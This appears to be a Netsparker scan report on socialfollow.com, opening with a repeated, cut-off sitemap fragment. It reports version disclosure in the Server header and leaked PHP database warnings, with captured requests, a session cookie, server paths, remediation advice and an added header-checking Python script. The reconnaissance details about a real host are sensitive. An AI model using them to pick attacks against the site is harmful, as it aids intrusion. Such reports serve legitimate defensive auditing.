<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
Perl Version Disclosure

Perl Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server discloses the Perl version in its HTTP response. The Server header on this response in fact reveals the whole stack: Apache 2.2.8 on Ubuntu, PHP 5.2.4 with the Suhosin patch, mod_ssl 2.2.8, OpenSSL 0.9.8g, mod_perl 2.0.3 and Perl 5.8.8. Exact version strings let an attacker look up known weaknesses for each component and make the host an easy match for automated tools that select targets by banner.

Impact

An attacker can search for published vulnerabilities affecting the identified Perl release (and the other components named in the same header) and combine that knowledge with the other findings in this report, choosing payloads and techniques known to work against this exact Apache and PHP build rather than guessing.

Remediation

Configure the web server so that the Server header carries no version information. On Apache this is ServerTokens Prod, which reduces the header to "Apache" and also drops the PHP, mod_ssl, OpenSSL, mod_perl and Perl tokens that modules append, together with ServerSignature Off; in php.ini set expose_php = Off to remove the X-Powered-By: PHP/... header that the other responses in this report carry. Two caveats: the -2ubuntu5.12 suffix shows these are Ubuntu 8.04 (hardy) packages that receive backported security fixes, so the upstream version number alone overstates the exposure; and hiding the banner changes nothing about the software itself, so keep the distribution's security updates flowing regardless.
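As an added example (not part of the Netsparker report or the site's code), the following Python script applies the same check to the response headers captured below and can be rerun after the configuration change to confirm the banner is gone. The header samples are constructed copies of the Server header shown in this finding and of the header Apache sends once ServerTokens Prod and expose_php = Off are set; the list of header names it inspects beyond Server is an assumption about where such banners usually appear.

```python
"""Check HTTP response headers for software version disclosure.

Added example, not part of the Netsparker report or the site's code. It
reproduces the version-disclosure check on the headers captured in this
finding and can be rerun after the ServerTokens change to confirm the fix.
"""
import re
from typing import Dict, List, Tuple

# Constructed copy of the response head shown in this finding (body omitted).
CAPTURED_HEADERS = """\
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Content-Type: application/xml
"""

# Constructed: what the same server sends with ServerTokens Prod and expose_php = Off.
HARDENED_HEADERS = """\
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache
Content-Type: application/xml
"""

# Headers that commonly carry banners (assumption: the usual suspects; extend as needed).
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")

# One product/version token, e.g. "Apache/2.2.8", "OpenSSL/0.9.8g", "Perl/v5.8.8".
TOKEN_RE = re.compile(r"([A-Za-z][\w.+-]*)/v?(\d[\w.-]*)")


def parse_headers(raw: str) -> Dict[str, str]:
    """Map lower-cased header names to values; stops at the blank line."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def version_tokens(raw: str) -> List[Tuple[str, str, str]]:
    """Every (header, product, version) triple disclosed in banner headers."""
    found: List[Tuple[str, str, str]] = []
    headers = parse_headers(raw)
    for name in BANNER_HEADERS:
        for product, version in TOKEN_RE.findall(headers.get(name, "")):
            found.append((name, product, version))
    return found


def discloses_perl(raw: str) -> bool:
    """The specific condition this finding reports."""
    return any(product.lower() == "perl" for _, product, _ in version_tokens(raw))


if __name__ == "__main__":
    for header, product, version in version_tokens(CAPTURED_HEADERS):
        print(f"{header}: {product} {version}")
```

Run it against the raw head of any stored response; on the captured sample it lists six product/version pairs, on the hardened sample none, which is the state to verify after the Apache restart.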
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

Perl/v5.8.

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message in the response. The body returned for GET /button/ opens with two PHP warnings: mysql_num_rows() was passed the result of a failed query (social-follow.php, line 6), and the attempt to set response headers at line 19 then failed because output had already started. Besides confirming that the query failed, the warnings disclose the absolute path /var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php, and since the response is served as text/javascript the HTML warning text is prepended to the button script itself, so any site that embeds the script gets a syntax error instead of a menu.

Impact

The error message may disclose sensitive information, which an attacker can use to mount new attacks or to enlarge the attack surface. In rare cases such a message is a clue to an SQL injection vulnerability; most of the time Netsparker detects and reports that problem separately.

Remedy

Do not display error messages in production. In PHP, set display_errors = Off and log_errors = On with error_log pointing outside the web root, and check the return value of mysql_query() before handing it to mysql_num_rows(). Save the full message with a reference number to backend storage such as a log file or database, then show the user only that number and a static, user-friendly error message.
- /button/

/button/

http://www.socialfollow.com/button/

Request

GET /button/ HTTP/1.1
Referer: http://www.socialfollow.com/button/image/?b=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu={divclass:'sociallinks',inlinestyle:'visibility:hidden',linktarget:'secwin'};menu.cols={divclass:'column',inlinestyle:''};menu.items=[];var socialfollow={init:function(targetclass){socialfollow.init(targetclass);}}var socialfollow={menusmap:{},effects:{delayhide:200,shadow:{enabled:true,opacity:0.3,depth:[5,5]},fade:{enabled:false,duration:500}},dimensions:{},getoffset:function(what,offsettype){return(what.offsetParent)?what[offsettype]+this.getoffset(what.offsetParent,offsettype):what[offsettype]},getoffsetof:function(el){el._offsets={left:this.getoffset(el,"offsetLeft"),top:this.getoffset(el,"offsetTop"),h:el.offsetHeight}},getdimensions:function(menu){this.dimensions={anchorw:menu.anchorobj.offsetWidth,anchorh:menu.anchorobj.offsetHeight,docwidth:(window.innerWidth||this.standardbody.clientWidth)-20,docheight:(window.innerHeight||this.standardbody.clientHeight)-15,docscrollx:window.pageXOffset||this.standardbody.scrollLeft,docscrolly:window.pageYOffset||this.standardbody.scrollTop}if(!this.dimensions.dropmenuw){this.dimensions.dropmenuw=menu.dropmenu.offsetWidth;this.dimensions.dropmenuh=menu.dropmenu.offsetHeight;}},isContained:function(m,e){var e=window.event||e;var c=e.relatedTarget||((e.type=="mouseover")?e.fromElement:e.toElement)while(c&&c!=m)try{c=c.parentNode}catch(e){c=m}return(c==m)?true:false;},setopacity:function(el,value){el.style.opacity=value;if(typeof 
el.style.opacity!="string"){el.style.MozOpacity=value;if(el.filters)el.style.filter="progid:DXImageTransform.Microsoft.alpha(opacity="+value*100+")"}},showmenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearTimeout(menu.hidetimer);this.getoffsetof(menu.anchorobj);this.getdimensions(menu);var posx=menu.anchorobj._offsets.left+(menu.orientation=="lr"?this.dimensions.anchorw:0);var posy=menu.anchorobj._offsets.top+this.dimensions.anchorh-(menu.orientation=="lr"?this.dimensions.anchorh:0)if(posx+this.dimensions.dropmenuw+this.effects.shadow.depth[0]>this.dimensions.docscrollx+this.dimensions.docwidth){posx=posx-this.dimensions.dropmenuw+(menu.orientation=="lr"?-this.dimensions.anchorw:this.dimensions.anchorw);}if(posy+this.dimensions.dropmenuh>this.dimensions.docscrolly+this.dimensions.docheight){posy=Math.max(posy-this.dimensions.dropmenuh-(menu.orientation=="lr"?-this.dimensions.anchorh:this.dimensions.anchorh),this.dimensions.docscrolly);}if(this.effects.fade.enabled){this.setopacity(menu.dropmenu,0);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,0);}menu.dropmenu.setcss({left:posx+'px',top:posy+'px',visibility:'visible'});if(this.effects.shadow.enabled){menu.shadow.setcss({left:posx+socialfollow.effects.shadow.depth[0]+'px',top:posy+socialfollow.effects.shadow.depth[1]+'px',visibility:'visible'});}if(this.effects.fade.enabled){clearInterval(menu.animatetimer);menu.curanimatedegree=0;menu.starttime=new Date().getTime();menu.animatetimer=setInterval(function(){socialfollow.revealmenu(menuid)},20);}},revealmenu:function(menuid){var menu=socialfollow.menusmap[menuid];var elapsed=new 
Date().getTime()-menu.starttime;if(elapsed<this.effects.fade.duration){this.setopacity(menu.dropmenu,menu.curanimatedegree);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,menu.curanimatedegree*this.effects.shadow.opacity);}else{clearInterval(menu.animatetimer);this.setopacity(menu.dropmenu,1);menu.dropmenu.style.filter="";}menu.curanimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetclass){if(document.querySelectorAll){return document.querySelectorAll("."+targetclass);}else{var classnameRE=new RegExp("(^|\\s+)"+targetclass+"($|\\s+)","i");var pieces=[];var alltags=document.all?document.all:document.getElementsByTagName("*");for(var i=0;i<alltags.length;i++){if(typeof alltags[i].className=="string"&&alltags[i].className.search(classnameRE)!=-1)pieces[pieces.length]=alltags[i];}return pieces;}},addDiv:function(divid,divclass,inlinestyle){var el=document.createElement("div");if(divid)el.id=divid;el.className=divclass;el.style.cssText=inlinestyle;document.body.insertBefore(el,document.body.firstChild);return el;},getmenuHTML:function(menuobj){var menucontent=[];var frag="";for(var i=0;i<menuobj.items.length;i++){if(menuobj.items[i][0]=="All Social Sites..."){frag+='<li><a href="javascript:popUp(400,100,600,300,1);" class="allSites">'+menuobj.items[i][0]+'</a></li>\n';menucontent.push(frag);frag="";}else{var socialSite=menuobj.items[i][0];var socialSiteID=menuobj.items[i][1];var socialSiteLink=menuobj.items[i][2];frag+='<li><a class="c'+socialSiteID+'" href="http://www.socialfollow.com/button/link?b=&amp;r='+document.referrer+'&amp;s='+socialSiteID+'&amp;l='+socialSiteLink+'" 
target="'+menuobj.linktarget+'">'+socialSite+'</a></li>\n';if(menuobj.items[i][3]=="efc"||i==menuobj.items.length-1){menucontent.push(frag);frag="";}}}if(typeof menuobj.cols=="undefined"){return'<ul>\n'+menucontent.join('')+'\n</ul>';}else{frag="<div class='show' style='padding: 0 3px;display:none'>";for(var i=0;i<menucontent.length;i++){frag+='<div class="'+menuobj.cols.divclass+'" style="'+menuobj.cols.inlinestyle+'">\n<ul>\n'+menucontent[i]+'</ul>\n</div>\n';}frag+="</div>";frag+='<div class="paddingSmall show" style="display:none"><div class="socialFollowLink"><a href="http://www.socialfollow.com/" target="_blank"><img src="http://www.socialfollow.com/button/image-link/?b=&amp;r='+document.referrer+'" border="0" alt="Get your own Social Follow button!" /></a></div></div>';frag+='<div class="bottomBorder show" style="display:none">&nbsp;</div>';return frag;}},addEvent:function(targetarr,functionref,tasktype){if(targetarr.length>0){var target=targetarr.shift()if(target.addEventListener){target.addEventListener(tasktype,functionref,false);}else if(target.attachEvent){target.attachEvent('on'+tasktype,function(){return functionref.call(target,window.event)});}this.addEvent(targetarr,functionref,tasktype);}},setupmenu:function(targetclass,anchorobj,pos){this.standardbody=(document.compatMode=="CSS1Compat")?document.documentElement:document.body;var relattr='menu';dropmenuid='menu';var dropmenuvar=window[dropmenuid];var dropmenu=this.addDiv(null,dropmenuvar.divclass,dropmenuvar.inlinestyle);dropmenu.innerHTML=this.getmenuHTML(dropmenuvar);var 
